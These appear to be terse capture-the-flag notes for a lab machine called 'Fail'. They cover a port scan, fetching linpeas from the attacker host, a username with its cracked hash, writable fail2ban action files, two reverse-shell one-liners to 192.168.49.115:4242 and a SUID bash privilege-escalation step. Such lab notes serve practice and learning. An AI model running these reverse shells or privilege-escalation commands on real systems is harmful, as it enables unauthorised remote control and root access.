Fail

Not shown: 998 closed tcp ports (conn-refused)

PORT STATE SERVICE

22/tcp open ssh

873/tcp open rsync

wget "http://192.168.49.115:80/linpeas.sh" -o linpeas.sh

fox:f1bddf02cd53fab415c1b46853072f6a

f1bddf02cd53fab415c1b46853072f6a:figa

Group fail2ban:

/etc/fail2ban/action.d

/etc/fail2ban/action.d/firewallcmd-ipset.conf

/etc/fail2ban/action.d/nftables-multiport.conf

/etc/fail2ban/action.d/firewallcmd-multiport.conf

/etc/fail2ban/action.d/mail-whois.conf

/etc/fail2ban/action.d/ufw.conf

#)You_can_write_even_more_files_inside_last_directory

bash -i >& /dev/tcp/192.168.49.115/4242 0>&1

sh -i >& /dev/udp/192.168.49.115/4242 0>&1

e8a7fd956f6c6192c033ebab14ce5ac3

https://hackmd.io/@tahaafarooq/privilege-escalation-fail2ban

Fail2ban privesc

:)

chmod u+s /bin/bash

Links

Last updated